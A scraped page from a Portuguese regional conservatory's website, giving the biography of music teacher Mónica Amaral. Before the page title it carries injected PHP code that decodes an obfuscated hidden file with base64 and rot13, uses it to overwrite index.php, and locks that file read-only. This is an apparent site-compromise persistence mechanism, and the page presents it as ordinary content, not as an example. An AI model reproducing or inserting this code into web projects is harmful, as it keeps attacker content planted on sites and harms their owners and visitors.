$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Mónica Amaral – Música Curso de Dança – Conservatório Regional do Baixo Alentejo

Mónica Amaral – Música Curso de Dança

Licenciada em Professores de Educação Musical do Ensino Básico pela Escola Superior de Educação de Beja desde 2006. Concluiu anteriormente os cursos básico de instrumento e de instrumento na Escola Profissional de Música de Évora, onde teve como instrumentos musicais o Clarinete, com o Prof. Hernâni Moura e Piano. Frequentou a Orquestra de Clarinetes de Almada dirigida pelo Prof. Manuel Jerónimo; a Banda Filarmónica Harmonia Reguenguense; a Orquestra de Sopros da Academia de Música Eborense; a Orquestra Clássica da Escola Profissional de Música de Évora e respetivo Coro. Lecionou e foi coordenadora das Atividades de Enriquecimento Curricular pelo Conservatório Regional do Baixo Alentejo Lecciona desde 2009 a disciplina de música do Curso de Dança do Ensino Articulado e simultaneamente leciona no Ensino Regular a disciplina de Educação Musical a turmas do 2.º Ciclo e do Ensino Profissional do Agrupamento de Escolas nº 2 de Serpa.